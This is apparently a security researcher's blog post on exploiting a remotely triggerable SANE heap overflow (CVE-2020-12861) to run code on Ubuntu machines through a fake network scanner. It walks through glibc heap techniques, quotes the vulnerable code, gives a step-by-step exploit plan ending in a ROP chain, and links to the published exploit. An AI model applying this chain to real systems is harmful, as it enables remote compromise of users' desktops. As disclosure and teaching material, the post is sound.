I recently reported several
vulnerabilities in
SANE —
an open-source library for interfacing with document scanners.
It is used by the
Simple Scan application,
which ships by default with Ubuntu Desktop.
One of the vulnerabilities,
CVE-2020-12861
(aka GHSL-2020-080),
is a remotely triggerable heap buffer overflow.
I thought it would be a great prank to play on my colleagues at the
GitHub UK office in Oxford if I could use it to pop a
calculator on their desktops.
Like me, many of my colleagues in Oxford run Ubuntu.
I doubt that many of them use Simple Scan on a regular basis,
but that’s easily solved with a little bit of social engineering.
I planned to post a message like this on our internal #oxford
channel:
Have any of you managed to get Ubuntu’s scanning application to work with the printer on the 2nd floor?
My colleagues are a helpful bunch, so I bet several of them would have immediately opened Simple Scan to try it out. Mwahaha!
Sadly, my plan was thwarted by COVID-19, because we are all working from home now. But it was an interesting exploitation challenge, regardless. Ultimately, I was successful, as you can see in this video.
Just starting Simple Scan is sufficient to trigger the vulnerability, because SANE Backends automatically searches the local network for scanners. All I need to do is connect my laptop to the office network and run a small server that pretends to be a network-attached scanner, then wait for my colleagues to start Simple Scan.
ASLR tries to ruin the prank
Address space layout randomization (ASLR) greatly increases the difficulty of exploiting a memory corruption vulnerability. To achieve code execution, you usually need to be able to forge code and data pointers, which means that you need to know the ASLR offsets. One way to deduce the ASLR offsets is with an infoleak vulnerability. I looked hard for a remote infoleak in SANE, but the only one that I found, CVE-2020-12863 (aka GHSL-2020-083), is useless in practice because it only works when the next byte on the stack is a valid ASCII digit. And even if it did work, it would leak very little useful information. For my prank to be viable, any amount of brute force is also out of the question. If my exploit doesn’t guess the ASLR offsets correctly on the first try, then Simple Scan will crash, which is “game over” for the prank.
My only hope is a local infoleak:
CVE-2020-12862
(aka GHSL-2020-082).
The function decode_binary
has an out-of-bounds read:
/* h000 */
static char *decode_binary(char *buf)
{
    char tmp[6];
    int hl;
    memcpy(tmp, buf, 4);
    tmp[4] = '\0';
    if (buf[0] != 'h')
        return NULL;
    hl = strtol(tmp + 1, NULL, 16);
    if (hl) {
        char *v = malloc(hl + 1);
        memcpy(v, buf + 4, hl);
        v[hl] = '\0';
        return v;
    }
    return NULL;
}
I control the contents of buf, so I also control the value of hl, which can be any value between 0 and 0xFFF (4095). So the memcpy can read beyond the end of buf.
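To make the arithmetic concrete, here is a minimal sketch of how the length is parsed from the `hXXX` header, next to a bounds-checked variant. The names `parse_binary_len` and `decode_binary_checked`, and the extra `buf_len` parameter, are hypothetical and only for illustration. This is not the upstream fix.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: parse the three hex digits that follow 'h'.
 * Returns -1 if the header does not start with 'h'. */
static long parse_binary_len(const char *buf)
{
    char tmp[4];

    assert(buf != NULL);
    if (buf[0] != 'h')
        return -1;
    memcpy(tmp, buf + 1, 3);
    tmp[3] = '\0';
    return strtol(tmp, NULL, 16);   /* at most 0xFFF */
}

/* Hypothetical bounds-checked variant. buf_len is the number of valid
 * bytes in buf, which the original function has no way of knowing. */
static char *decode_binary_checked(const char *buf, size_t buf_len)
{
    long hl;
    char *v;

    if (buf_len < 4)
        return NULL;
    hl = parse_binary_len(buf);
    if (hl <= 0 || (size_t) hl > buf_len - 4)
        return NULL;                /* payload would run past buf */
    v = malloc((size_t) hl + 1);
    if (v == NULL)
        return NULL;
    memcpy(v, buf + 4, (size_t) hl);
    v[hl] = '\0';
    return v;
}
```

With a 7-byte buffer, the header `h003` is accepted, while `hFFF` is rejected instead of copying 4095 bytes from whatever happens to follow the buffer.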
Since buf is a stack buffer (rbuf in esci2_cmd), I can use this to copy up to 4095 bytes of stack data into a newly allocated heap buffer.
In other words, I can use this vulnerability to copy all kinds of juicy information,
such as stack pointers, heap pointers, and code pointers, into a heap buffer.
The only problem is that all of that data is on the wrong computer.
A local infoleak can be just as good as a remote infoleak if the victim application contains a scripting engine. For example, browser exploits usually involve a malicious JavaScript program that runs in the victim’s browser. There’s no need to transmit the leaked pointers back to the attacker’s computer if you can process them on-site. SANE does not contain a scripting engine though.
Luckily, I don’t need a full scripting engine. All I really need is a single subtraction operation. I’ll explain why in more detail later, but the short reason is that the whole exploit hinges on being able to overwrite a specific stack address with a large number. The local infoleak gives me a stack pointer, which is always exactly 0x218 higher in memory than the stack address which I want to overwrite. So I need to subtract 0x218 from the pointer. If I can find a way to do that then the rest of the exploit will fall into place.
To compute the subtraction, I’ll use a variation on a classic heap exploitation technique known as the “House of Force.”
The Malloc Maleficarum
The Malloc Maleficarum is
a legendary document from 2005 about glibc heap exploitation.
It introduced a number of new exploitation techniques with names like the
“House of Lore” and the “House of Spirit.”
Almost 15 years later,
improved sanity checks in glibc’s malloc
implementation have
closed the door on several of the houses.
For example, the House of Lore has been closed since glibc version 2.26.
Soon, it will also be time to say farewell to the House of Force,
which is shut down by improved sanity checking in glibc 2.29.
But the House of Force isn’t out of business yet:
Ubuntu 18.04 LTS is one of the
most widely used Linux distributions, and it ships with glibc 2.27.
A fantastic resource for learning about glibc heap exploitation is the how2heap repository, by the Shellphish team. It covers a large selection of techniques, including the Malloc Maleficarum techniques that still work. It also includes a convenient test harness for running the examples on different glibc versions. I particularly like how each technique is documented as a runnable C program, so that you can step through the code in gdb and see exactly what is happening.
I have published the complete source code for my exploit. Warning: it’s ugly, and to fully understand what it’s doing you need to simultaneously debug the exploit source code and the SANE source code. Instead, I thought it would be more useful to present the important parts of the exploit as standalone how2heap-style C programs. You can download the demos and run them yourself:
git clone https://github.com/github/securitylab
cd securitylab/SecurityExploits/SANE/epsonds_CVE-2020-12861/glibc_heap_exploit_demos/home
make
./01_chunk_layout # run the first example
The demos are designed to work with glibc 2.27, so if your system has a different glibc version then I recommend running the demos in Docker. I have included a Dockerfile based on an Ubuntu 18.04 LTS image for this purpose:
git clone https://github.com/github/securitylab
cd securitylab/SecurityExploits/SANE/epsonds_CVE-2020-12861/glibc_heap_exploit_demos/
sudo docker build . -t glibc-heap-exploit-demos --build-arg UID=`id -u`
sudo docker run --rm -i -t glibc-heap-exploit-demos
# We're in a container now.
make
./01_chunk_layout # run the first example
I will present these demos first, and at the end of the blog post, will explain how I combined the techniques to create a working exploit for the SANE vulnerabilities.
The demos only focus on the parts of the glibc allocator that are relevant to the exploit. If you would like to read a more general overview of how the glibc allocator works, I recommend reading Azeria’s two-part series.
Demo 1: glibc memory chunk layout
01_chunk_layout.c is a very simple demo to illustrate the “chunk” data structure used by the glibc malloc implementation. Here’s a diagram of what chunks look like in memory:1
Notice that the blocks of user data are separated by metadata blocks of size 0x10 bytes. The demo allocates four chunks, frees one of them, and then prints the metadata, which looks like this:
Chunk 0:
0x55d899c2c250: 0000000000000000 0000000000000811 (metadata)
0x55d899c2c260: 0000000000000000 0000000000000000 (user data)
0x55d899c2c270: 0000000000000000 0000000000000000 (user data)
Chunk 1:
0x55d899c2ca60: 0000000000000000 0000000000000811 (metadata)
0x55d899c2ca70: 0000000000000000 0000000000000000 (user data)
0x55d899c2ca80: 0000000000000000 0000000000000000 (user data)
Chunk 2 (free):
0x55d899c2d270: 0000000000000000 0000000000000811 (metadata)
0x55d899c2d280: 00007f4021262ca0 00007f4021262ca0 (user data)
0x55d899c2d290: 0000000000000000 0000000000000000 (user data)
Chunk 3:
0x55d899c2da80: 0000000000000810 0000000000000810 (metadata)
0x55d899c2da90: 0000000000000000 0000000000000000 (user data)
0x55d899c2daa0: 0000000000000000 0000000000000000 (user data)
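The size fields in the listing can be decoded with a little bit arithmetic. This is a minimal sketch, assuming 64-bit glibc defaults (8-byte size field, 16-byte alignment, minimum chunk size 0x20). The function names are hypothetical and are not glibc's own.

```c
#include <assert.h>
#include <stdint.h>

#define SIZE_SZ      8u      /* sizeof(size_t) on x86-64 */
#define MALLOC_ALIGN 16u
#define MINSIZE      0x20u
#define PREV_INUSE   0x1u
#define FLAG_MASK    0x7u    /* the three low bits of the size field are flags */

/* Chunk size (metadata included) that a request of req bytes is rounded to. */
static uint64_t request_to_chunk_size(uint64_t req)
{
    uint64_t sz;

    assert(req <= UINT64_MAX - (SIZE_SZ + MALLOC_ALIGN));
    sz = (req + SIZE_SZ + MALLOC_ALIGN - 1) & ~(uint64_t) (MALLOC_ALIGN - 1);
    return sz < MINSIZE ? MINSIZE : sz;
}

/* Size of the chunk with the flag bits stripped. */
static uint64_t chunk_size(uint64_t size_field)
{
    return size_field & ~(uint64_t) FLAG_MASK;
}

/* Is the chunk immediately below this one still allocated? */
static int prev_in_use(uint64_t size_field)
{
    return (size_field & PREV_INUSE) != 0;
}
```

A size field of 0x811 decodes to a chunk of 0x810 bytes whose lower neighbour is in use, which matches the 0x810 spacing between the chunk addresses. Chunk 3 shows 0x810 instead, because chunk 2 below it has been freed.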
The vulnerability in SANE is a heap buffer overflow, so it enables me to overwrite the next chunk in memory. There are two particularly important observations to be made about that:
- The chunk metadata contains only size information. Since it does not contain any pointers, I can overwrite the metadata before I have obtained the ASLR offsets.
- The user data section is used to store metadata after the chunk has been freed. Therefore, I can only safely overwrite the user data section of the next chunk if:
  - It is currently allocated, or
  - I know the ASLR offsets.
In other words, a heap buffer overflow gives me a lot of power to manipulate the heap without needing to know the ASLR offsets. And once I have deduced the ASLR offsets, I can start overwriting the pointers in freed chunks and thereby gain access to other areas of memory, such as the stack.
Demo 2: arithmetic with top
The top chunk is the sentinel chunk at the top of the heap. It has metadata, but its user data section is unused. When the allocator has run out of free chunks, it allocates memory from the top chunk. This means that the top chunk shrinks and moves to a higher memory location:
The top chunk is usually moderately sized (0x10000 bytes or so). If there isn’t enough memory left in the top chunk to service an allocation then the allocator uses a system call to request more memory from the OS. The concept of the House of Force is to overwrite the size of the top chunk with a very large number, so that the allocator thinks that it can allocate a huge chunk without needing to request more memory from the OS. The how2heap repository has a nice demo of the House of Force.
I already mentioned that my exploit uses a variation on the House of Force to compute a subtraction. The idea is to overwrite the size of the top chunk with a pointer. Then, by allocating another chunk, I can subtract an offset from the pointer. 02_arithmetic_with_top.c is a simple demo of this idea. As mentioned in the demo, there is a slight issue because the least significant three bits of the chunk size contain important metadata, which causes the bottom byte of the pointer to get modified in an inconvenient way. In the exploit, I avoid this by writing the stack address one byte higher in memory, which has the effect of multiplying the number by 0x100 (because the machine is little-endian). The offset that I need to subtract from the pointer for the exploit to work is 0x218, so I actually need to allocate 0x21800 bytes to get the correct result.
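The subtraction can be modelled without touching a real heap. This is a minimal sketch, assuming the glibc 2.27 behaviour of subtracting the chunk size from the size of top and setting the PREV_INUSE flag. The function names and the example values are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Size field of top after a chunk of nb bytes has been carved off it. */
static uint64_t top_size_after_alloc(uint64_t top_size_field, uint64_t nb)
{
    uint64_t size = top_size_field & ~(uint64_t) 0x7;   /* strip flag bits */

    assert(size >= nb + 0x20);  /* top is only used if it is big enough */
    return (size - nb) | 0x1;   /* remainder, with PREV_INUSE set */
}

/* Writing a pointer one byte above the size field leaves the low byte
 * (which holds the flag bits) untouched and shifts the pointer left by 8. */
static uint64_t overlay_pointer(uint64_t old_size_field, uint64_t ptr)
{
    return (ptr << 8) | (old_size_field & 0xff);
}
```

For example, with an old top size of 0x20d41 and a pointer of 0x7ffc12345678, the forged size field is 0x7ffc1234567841. Carving off a chunk of 0x21800 bytes leaves 0x7ffc1234546041, and the upper bytes are exactly the pointer minus 0x218.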
Demo 3: overlapping a chunk with top
Did I just create a chicken-and-egg problem? If I am able to overwrite the size of the top chunk with a pointer, doesn’t that imply that I have already defeated ASLR? If so, what’s the point of the elaborate exercise to subtract an offset from the pointer? The answer is that I don’t use the buffer overflow directly. Instead, I use it indirectly to create a chunk that overlaps with the top chunk. Later, that chunk is allocated and a pointer is written into it, overwriting the size of the top chunk. Here’s a diagram illustrating the idea:
In the first part of the diagram, two chunks have been
allocated adjacent to the top chunk.
A heap buffer overflow on the first chunk overwrites
the metadata of the second, making it look bigger.
When the second chunk is freed,
it is returned with a larger size than when it was allocated.
Later, an allocation with the larger size
returns a pointer to this chunk which overlaps with the
top chunk.
In the SANE exploit, I have arranged things so that the call to malloc in decode_binary (see above) returns a chunk that overlaps with the top chunk, which is how I am able to overwrite the size of the top chunk with a stack pointer.
The demo is 03_overlap_top_chunk.c.
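The offsets involved are easy to work out by hand. This is a minimal sketch of the arithmetic, assuming the 0x10-byte metadata block from Demo 1 and a chunk that sits directly below the top chunk. Both function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define HDR 0x10u   /* size of the metadata block in front of the user data */

/* Offset of top's size field, measured from the start of the user data of
 * the chunk (of real size real_size) that sits directly below top. */
static uint64_t top_size_offset(uint64_t real_size)
{
    assert(real_size >= 0x20 && (real_size & 0xf) == 0);
    return real_size - HDR + 8;
}

/* Does the user data of the chunk reach past top's size field once its
 * size has been forged to fake_size? */
static int covers_top_size(uint64_t real_size, uint64_t fake_size)
{
    return fake_size - HDR >= top_size_offset(real_size) + 8;
}
```

For a chunk whose real size is 0x50, top's size field sits 0x48 bytes into the user data, so the forged size has to be at least 0x60 before a write into the chunk can reach it.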
Demo 4: fastbin reverse into tcache
Using the variation on the House of Force just described,
I can calculate a stack address that I want to overwrite.
The next step is to overwrite that address.
The how2heap repository contains a technique called
unsorted bin attack,
which does exactly that.
A call to malloc
causes a large value (a pointer) to be written to a stack address.
Unfortunately, I discovered that the unsorted bin attack isn’t suitable for my exploit,
because I need to trigger the write with an 0x40 byte allocation.
The unsorted bin attack only works with an 0x410 byte allocation, or larger.
Luckily, I was able to find a different technique that works for allocations up to 0x78 bytes.
I named this technique “fastbin reverse into tcache” and submitted a
pull request,
which has been merged into the how2heap repository.
I also asked in the pull request whether it was already a known technique.
Kyle Zeng, one of the maintainers of the how2heap repository,
says
it was first made public in the 2019 HITCON CTF.
The tcache and fastbins are both caches for small-sized chunks, indexed by chunk size, so that a request for a specific chunk size can be serviced very quickly. I am not entirely sure why the allocator needs two caches. The tcache was added to the codebase more recently than the fastbins and appears, in my opinion, to have made the fastbins mostly redundant. The only limitation that the tcache has, which the fastbins don’t, is that the tcache has a maximum capacity of seven chunks per size. So if you have allocated a large number of chunks, all of the same size, and then free them all in rapid succession, then the first seven chunks go into the tcache and the rest go into the fastbins.
If the tcache is empty, then the allocator tries to allocate from the fastbin instead. But, as the comment in the source code says, it doesn’t just allocate one chunk from the fastbin: it also refills the tcache. Since the tcache has a maximum capacity of seven chunks, this means that seven chunks are taken from the fastbin and moved to the tcache. Since the chunks are stored as a singly linked list, a side effect of this is that the list is reversed. The “fastbin reverse into tcache” technique uses this list reversal behavior to overwrite a value on the stack, as depicted in this diagram:
The diagram starts with an empty tcache and seven chunks
in the fastbin.
A memory corruption vulnerability has been used to overwrite
the forward pointer of the seventh chunk with a pointer to the
stack.
The stack is not a valid chunk, so its forward pointer is invalid.
The second part of the diagram shows the situation after
a chunk has been allocated.
malloc
has returned the head of the fastbin list.
The rest of the list has been reversed and moved to the tcache.
Unfortunately, the fastbin now points to the garbage
pointer that was previously on the stack.
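The list reversal is easy to reproduce with a toy model. This is a minimal sketch that uses ordinary linked-list nodes instead of real heap chunks. The types and function names are hypothetical, and the last node stands in for the stack location in the simpler case where its forward pointer is NULL.

```c
#include <assert.h>
#include <stddef.h>

#define TCACHE_MAX 7    /* tcache capacity per chunk size */

struct node { int id; struct node *next; };

struct bins {
    struct node *fastbin;   /* singly linked, allocates from the head */
    struct node *tcache;    /* singly linked, allocates from the head */
    int tcache_count;
};

/* Link nodes[0..count-1] into a list and return its head. */
static struct node *link_nodes(struct node *nodes, int count)
{
    for (int i = 0; i < count; i++) {
        nodes[i].id = i;
        nodes[i].next = (i + 1 < count) ? &nodes[i + 1] : NULL;
    }
    return &nodes[0];
}

/* Model of a small allocation: serve from the tcache if possible,
 * otherwise take the fastbin head and refill the tcache from the rest. */
static struct node *model_malloc(struct bins *b)
{
    struct node *victim;

    assert(b != NULL);
    if (b->tcache != NULL) {
        victim = b->tcache;
        b->tcache = victim->next;
        b->tcache_count--;
        return victim;
    }
    victim = b->fastbin;
    if (victim == NULL)
        return NULL;
    b->fastbin = victim->next;
    while (b->tcache_count < TCACHE_MAX && b->fastbin != NULL) {
        struct node *n = b->fastbin;
        b->fastbin = n->next;
        n->next = b->tcache;    /* this is the write into the "stack" node */
        b->tcache = n;
        b->tcache_count++;
    }
    return victim;
}
```

With eight nodes in the fastbin (seven chunks followed by the stand-in for the stack), one call returns node 0 and leaves the stack node at the head of the tcache, with its forward pointer now pointing at the seventh chunk.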
There are two versions of the demo.
The first version,
04_A_fastbin_reverse_into_tcache.c,
demonstrates the simpler scenario in which the value on the stack is zero.
Because it looks like a NULL pointer, there is no risk of accidentally
dereferencing an invalid pointer, so there is no need for the fastbin
to contain exactly seven elements.
It also means that the technique doesn’t leave the fastbin in an invalid state.
The second version of the demo,
04_B_fastbin_reverse_into_tcache.c,
demonstrates the scenario in which there is garbage on the stack.
In this scenario, the technique leaves the fastbin in an invalid state.
Allocations that can be served from the tcache still work fine,
but any allocation that triggers a call to
malloc_consolidate
will cause a crash.
In other words: no more large allocations.
I found myself in this situation in the SANE exploit and it almost
scuppered the whole thing.
But I found a workaround, at the expense of having to trigger a codepath containing a call to sleep.
It’s the reason why the exploit takes approximately 10 seconds to run.
This technique has another limitation:
malloc_consolidate
empties the fastbins.
That means that no large allocations can happen while the technique is in
progress.
Both versions of the demo contain a commented out malloc(0x410)
to
show this problem:
04_A_fastbin_reverse_into_tcache.c, line 65
and
04_B_fastbin_reverse_into_tcache.c, line 67.
Uncommenting those allocations breaks the demos.
This is an obstacle that I need to overcome in the SANE exploit,
because it means that I have to find a way to fill the fastbin
during the final step of the exploit, rather than being able
to set it up in advance.
Demo 5: shrinking a chunk while it’s in the tcache
The final demo is quite a simple technique, but I use it extensively in the SANE exploit to work around the limitation of the “fastbin reverse into tcache” technique which I just mentioned. I need a way to quickly free seven chunks so that they will be added to the fastbin. But all I have to work with is this code, which allocates some memory and then immediately frees it:
char *v = decode_string(value);
DBG(1, " version: %s\n", v);
free(v);
The good news is that I can send a command which triggers this code seven times in quick succession. The bad news is that it will keep reusing the same chunk and not add any new chunks to the fastbin. The trick is to corrupt some chunks in the tcache so that I can allocate them with one size, and then free them with a smaller size. This is simple to do with a buffer overflow that overwrites the metadata below the chunk:
I just need to make sure that the user data section of the chunk contains some fake metadata, so that it won’t trigger any run-time checks when it is freed.
The demo is 05_shrink_tcache_chunk.c.
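The reason the trick works is that free decides where a chunk goes by looking at the size stored in its metadata at that moment. This is a minimal model of that decision, assuming the glibc 2.27 defaults on x86-64 (tcache for chunk sizes up to 0x410 with seven entries per size, fastbins for chunk sizes up to 0x80). The enum and function name are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

enum dest { DEST_TCACHE, DEST_FASTBIN, DEST_OTHER };

/* Where does a freed chunk go, given the size in its metadata and the
 * number of entries already in the tcache bin for that size? */
static enum dest free_destination(uint64_t chunk_size, unsigned tcache_count)
{
    assert(chunk_size >= 0x20 && (chunk_size & 0xf) == 0);
    if (chunk_size <= 0x410 && tcache_count < 7)
        return DEST_TCACHE;
    if (chunk_size <= 0x80)
        return DEST_FASTBIN;
    return DEST_OTHER;      /* unsorted bin, consolidation, and so on */
}
```

A chunk that was handed out as size 0x400 but has had its size rewritten to 0x50 is treated as a 0x50 chunk when it is freed, so it lands in the fastbin as long as the tcache bin for 0x50 is already full.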
SANE vulnerability overview and exploit plan
On startup, SANE Backends automatically searches for scanners.
It seems that every manufacturer has designed their own unique
protocol for communicating with their devices,
so SANE Backends has to iterate through all the different brands
(HP, Canon, etc.),
trying each of their protocols in turn.
The vulnerability that I am going to exploit is in the implementation of
the EPSON protocol.
The protocol starts with SANE Backends sending out a broadcast UDP message and listening for responses, in e2_network_discovery:
sanei_udp_write_broadcast(fd, 3289, (unsigned char *) query, 15);
DBG(5, "%s, sent discovery packet\n", __func__);
to.tv_sec = 1;
to.tv_usec = 0;
FD_ZERO(&rfds);
FD_SET(fd, &rfds);
sanei_udp_set_nonblock(fd, SANE_TRUE);
while (select(fd + 1, &rfds, NULL, NULL, &to) > 0) {
    if ((len = sanei_udp_recvfrom(fd, buf, 76, &ip)) == 76) {
        DBG(5, " response from %s\n", ip);
        /* minimal check, protocol unknown */
        if (strncmp((char *) buf, "EPSON", 5) == 0)
            attach_one_net(ip);
    }
}
So the first step of the exploit is to run a server, listening on UDP port 3289, which will respond to any incoming messages. Notice that the code above is designed to handle multiple replies. That’s crucial for the exploit, because it enables me to trigger the heap overflow an unlimited number of times. When my server receives the broadcast message, it fires off 128 replies to keep this loop running for a while.
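The reply only has to satisfy the two checks in the loop: it must be exactly 76 bytes long and start with "EPSON". This is a minimal sketch of the reply side, assuming that the remaining bytes are not inspected, so they are simply zeroed. The function names are hypothetical, and socket setup (binding to UDP port 3289 and receiving the query) is left out.

```c
#include <assert.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>

#define REPLY_LEN 76

/* Fill out with a reply that passes the length and prefix checks. */
static void build_discovery_reply(unsigned char out[REPLY_LEN])
{
    assert(out != NULL);
    memset(out, 0, REPLY_LEN);  /* assumption: the rest is not inspected */
    memcpy(out, "EPSON", 5);
}

/* Send count identical replies to the address the query came from.
 * Returns the number of replies that were sent successfully. */
static int send_replies(int fd, const struct sockaddr *to, socklen_t to_len,
                        int count)
{
    unsigned char reply[REPLY_LEN];
    int sent = 0;

    build_discovery_reply(reply);
    for (int i = 0; i < count; i++) {
        if (sendto(fd, reply, sizeof(reply), 0, to, to_len)
                == (ssize_t) sizeof(reply))
            sent++;
    }
    return sent;
}
```

Calling `send_replies` with a count of 128 and the address returned by `recvfrom` would correspond to the burst of replies described above.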
Although it is extremely convenient that I can trigger the loop in e2_network_discovery
an unlimited number of times, it also creates two hurdles.
The first hurdle is just a minor inconvenience:
an object of type struct epsonds_device
(size 0xf8 bytes) is
leaked
on every iteration.
If the top chunk is ever used to service that allocation then it will throw
the exploit into chaos,
so I need to make sure that I create lots of small gaps in the heap to absorb the leaks
during the heap grooming phase of the exploit.
The second hurdle is more serious:
on every iteration, an object of type struct epsonds_scanner
(size 0x820 bytes) is
allocated
(and also freed, thankfully).
Since that’s a large allocation, it triggers a call to malloc_consolidate.
Therefore, if I want to use the “fastbin reverse into tcache” technique,
it has to happen within a single iteration.
After the initial UDP exchange, the protocol switches to TCP communication,
which is where the bugs are.
The TCP communication is handled by a pair of functions: epsonds_net_write and epsonds_net_read.
First, epsonds_net_write sends a short message containing a command and an expected reply size.
It also allocates a heap buffer for the reply.
Then epsonds_net_read receives the reply:
/* receive net header */
size = epsonds_net_read_raw(s, header, 12, status);
if (size != 12) {
    return 0;
}
if (header[0] != 'I' || header[1] != 'S') {
    DBG(1, "header mismatch: %02X %02x\n", header[0], header[1]);
    *status = SANE_STATUS_IO_ERROR;
    return 0;
}
// incoming payload size
size = be32atoh(&header[6]);
DBG(23, "%s: wanted = %lu, available = %lu\n", __func__,
    (u_long) wanted, (u_long) size);
*status = SANE_STATUS_GOOD;
if (size == wanted) {
    DBG(15, "%s: full read\n", __func__);
    if (size) {
        read = epsonds_net_read_raw(s, buf, size, status);
    }
    if (s->netbuf) {
        free(s->netbuf);
        s->netbuf = NULL;
        s->netlen = 0;
    }
    if (read < 0) {
        return 0;
    }
} else if (wanted < size) {
    DBG(23, "%s: long tail\n", __func__);
    read = epsonds_net_read_raw(s, s->netbuf, size, status); /* <===== no bounds check */
    if (read != size) {
        return 0;
    }
    memcpy(buf, s->netbuf, wanted);
    read = wanted;
    free(s->netbuf);
    s->netbuf = NULL;
    s->netlen = 0;
} else {
    DBG(23, "%s: partial read\n", __func__);
    read = epsonds_net_read_raw(s, s->netbuf, size, status);
    if (read != size) {
        return 0;
    }
    s->netlen = size - wanted;
    s->netptr += wanted;
    read = wanted;
    DBG(23, "0,4 %02x %02x\n", s->netbuf[0], s->netbuf[4]);
    DBG(23, "storing %lu to buffer at %p, next read at %p, %lu bytes left\n",
        (u_long) size, s->netbuf, s->netptr, (u_long) s->netlen);
    memcpy(buf, s->netbuf, wanted);
}
return read;
I highlighted the line of code where the heap buffer overflow is.
s->netbuf is the heap buffer (of size wanted) that was allocated during epsonds_net_write.
I control the value of size, so I can overflow the buffer.
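From the attacker's side, triggering the overflow only requires a 12-byte header that starts with "IS" and carries a big-endian size at offset 6. This is a minimal sketch, assuming the other header bytes are not checked on this path, so they are zeroed. The function names are hypothetical, and `reply_fits` shows the kind of comparison that is missing rather than the actual upstream fix.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define NET_HEADER_LEN 12

/* Decode a 32-bit big-endian integer. */
static uint32_t be32_decode(const unsigned char *p)
{
    return ((uint32_t) p[0] << 24) | ((uint32_t) p[1] << 16) |
           ((uint32_t) p[2] << 8) | (uint32_t) p[3];
}

/* Build a reply header that announces payload_size bytes of payload. */
static void build_reply_header(unsigned char out[NET_HEADER_LEN],
                               uint32_t payload_size)
{
    assert(out != NULL);
    memset(out, 0, NET_HEADER_LEN); /* assumption: other fields unchecked */
    out[0] = 'I';
    out[1] = 'S';
    out[6] = (unsigned char) (payload_size >> 24);
    out[7] = (unsigned char) (payload_size >> 16);
    out[8] = (unsigned char) (payload_size >> 8);
    out[9] = (unsigned char) payload_size;
}

/* The check that the "long tail" branch does not make: does a payload of
 * size bytes fit into a buffer of wanted bytes? */
static int reply_fits(uint32_t size, uint32_t wanted)
{
    return size <= wanted;
}
```

A header announcing 0x1000 bytes in response to a request that expected 0x40 bytes takes the "long tail" branch and writes 0x1000 bytes into a 0x40-byte buffer.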
One of the things that I find fascinating about exploitation
is that minor bugs,
which wouldn’t normally be classified as security bugs,
can sometimes be just as important for the exploit to work
as the security bug.
In this code, the minor bug that’s almost as important as the heap overflow is the memory leak that happens in the final else branch.
Notice that there is no call to free(s->netbuf).
My exploit uses this extensively for heap grooming.
Exploit plan
As I mentioned earlier,
I couldn’t find a usable remote infoleak in SANE.
Instead, I will use the heap buffer overflow to
manufacture one.
The function epsonds_net_write, which I mentioned above, sends commands to the scanner:
int
epsonds_net_write(epsonds_scanner *s, unsigned int cmd, const unsigned char *buf,
                  size_t buf_size, size_t reply_len, SANE_Status *status)
{
    unsigned char *h1, *h2;
    unsigned char *packet = malloc(12 + 8);
    /* XXX check allocation failure */
    h1 = packet; // packet header
    h2 = packet + 12; // data header
    if (reply_len) {
        s->netbuf = s->netptr = malloc(reply_len);
        s->netlen = reply_len;
        DBG(24, "allocated %lu bytes at %p\n",
            (u_long) reply_len, s->netbuf);
    }
    DBG(24, "%s: cmd = %04x, buf = %p, buf_size = %lu, reply_len = %lu\n",
        __func__, cmd, buf, (u_long) buf_size, (u_long) reply_len);
    memset(h1, 0x00, 12);
    memset(h2, 0x00, 8);
    h1[0] = 'I';
    h1[1] = 'S';
    h1[2] = cmd >> 8; // packet type
    h1[3] = cmd; // data type
    h1[4] = 0x00;
    h1[5] = 0x0C; // data offset
    DBG(24, "H1[0]: %02x %02x %02x %02x\n", h1[0], h1[1], h1[2], h1[3]);
    // 0x20 passthru
    // 0x21 job control
    if (buf_size) {
        htobe32a(&h1[6], buf_size);
    }
    if((cmd >> 8) == 0x20) {
        htobe32a(&h1[6], buf_size + 8); // data size (data header + payload)
        htobe32a(&h2[0], buf_size); // payload size
        htobe32a(&h2[4], reply_len); // expected answer size
        DBG(24, "H1[6]: %02x %02x %02x %02x (%lu)\n", h1[6], h1[7], h1[8], h1[9], (u_long) (buf_size + 8));
        DBG(24, "H2[0]: %02x %02x %02x %02x (%lu)\n", h2[0], h2[1], h2[2], h2[3], (u_long) buf_size);
        DBG(24, "H2[4]: %02x %02x %02x %02x (%lu)\n", h2[4], h2[5], h2[6], h2[7], (u_long) reply_len);
    }
    if ((cmd >> 8) == 0x20 && (buf_size || reply_len)) {
        // send header + data header
        sanei_tcp_write(s->fd, packet, 12 + 8);
    } else {
        sanei_tcp_write(s->fd, packet, 12);
    }
    // send payload
    if (buf_size)
        sanei_tcp_write(s->fd, buf, buf_size);
    free(packet);
    *status = SANE_STATUS_GOOD;
    return buf_size;
}
I will overwrite the value of buf_size so that the final call to sanei_tcp_write sends far more bytes than it should. buf is a stack pointer, so this will result in a remote infoleak containing all the information that I need to complete the exploit.
How can I overwrite buf_size though? It is stored in a register, so the only opportunity that I have to alter its value is during one of the calls to malloc at the beginning of the function, when it is temporarily saved to the stack. That is why I need to use the “fastbin reverse into tcache” technique: it enables me to overwrite buf_size during that malloc. I use the variant of the House of Force to calculate the stack address where buf_size will be saved.
These are the main steps of the exploit:
- Groom the heap by deliberately leaking memory. There are three goals:
  - Fill any large gaps so that any subsequent large allocations will come from the top chunk.
  - Leave plenty of smaller gaps to absorb smaller memory leaks. In particular, the code is going to leak an object of type struct epsonds_device (size 0xf8 bytes) on every iteration.
  - Empty the tcache for allocations of size 0x3d0, 0x3e0, 0x3f0, and 0x400. That’s because I want to allocate blocks of those sizes from the top chunk and then store them in the tcache to use later.
- Prepare a magazine of chunks in the tcache using the “shrink a chunk while it’s in the tcache” technique. I use these chunks later in the “fastbin reverse into tcache” technique.
- Allocate and free a large chunk from the top chunk. The purpose of this is to mmap enough memory to ensure that the subsequent top chunk shenanigans don’t accidentally hit unmapped memory and trigger a SIGSEGV.
- Create a chunk that overlaps with the top chunk.
- Use the variant of the House of Force to calculate the stack address where buf_size will be saved.
- Trigger “fastbin reverse into tcache”.
- Receive the stack dump and reply with a simple ROP chain.
The reason why I am able to immediately reply with a ROP chain in the final step is that the next heap allocation returns a stack pointer, due to the “fastbin reverse into tcache” technique. Therefore, I am able to send back a reply which overwrites the stack. I can do this reliably, because the stack dump has given me stack pointers, heap pointers, code pointers, and the value of the stack canary.
Farewell to the House of Force
